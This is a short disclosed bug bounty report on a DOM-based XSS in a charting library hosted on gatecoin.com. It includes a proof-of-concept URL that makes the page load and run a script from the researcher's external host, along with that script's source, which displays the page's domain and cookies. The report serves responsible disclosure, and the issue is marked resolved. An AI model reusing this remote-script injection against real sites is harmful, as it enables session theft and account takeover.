DOM Based XSS charting_library

Disclosed: 2018-10-19 07:53:26 By bobrov To gatecoin
Medium
Vulnerability Details
**Description** charting_library contains a DOM Based XSS vulnerability that allows to load an external JS script and execute it. **PoC** Open URL in any browser ``` https://gatecoin.com/widget-trade/assets/charting_library/static/tv-chart.html#indicatorsFile=//blackfan.ru/tv-chart-poc&disabledFeatures=[]&enabledFeatures=[] ``` **Vulnerable script** https://gatecoin.com/widget-trade/assets/charting_library/static/bundles/library.js **Vulnerable code** ```js $.getScript(urlParams.indicatorsFile) ``` blackfan.ru/tv-chart-poc source ```php <?php header("Access-Control-Allow-Origin: *"); header("Access-Control-Allow-Headers: cache-control, X-Requested-With"); ?> alert(document.domain); alert(document.cookie); ``` ## Impact DOM Based XSS
Actions
View on HackerOne
Report Stats
  • Report ID: 351275
  • State: Closed
  • Substate: resolved
  • Upvotes: 23
Share this report